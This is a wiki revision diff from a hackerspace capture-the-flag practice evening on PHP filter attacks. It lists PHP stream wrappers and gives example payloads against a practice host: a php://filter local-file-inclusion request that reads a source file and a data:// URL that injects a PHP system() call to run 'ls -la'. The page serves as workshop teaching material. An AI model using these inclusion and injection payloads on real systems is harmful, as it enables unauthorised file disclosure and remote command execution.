Difference between revisions of "CTF-practice-evening:2014-06-23"

From Technologia Incognita
Jump to: navigation, search
Line 30: Line 30:
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
 
** http://coolfire.insomnia247.nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
 
** http://coolfire.insomnia247.nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
** (
+
** ( expect:// )
 +
** arrays: /index.php?page[]=A&page[]=B
 +
 
 +
= Enigma gropu PHP hash cracker =
 +
 
 +
* http://www.enigmagroup.org/forums/login

Revision as of 18:39, 23 June 2014

CTF-practice-evening:2014-06-23
Date 2014/06/23
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 20

  • 23 June, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

PHP Filter attacks

  • Coolfire is providing the content for this evening!  :-)
  • PHP commands:
    • php://input
    • output
    • df
    • memory
    • temp
    • filter

Enigma gropu PHP hash cracker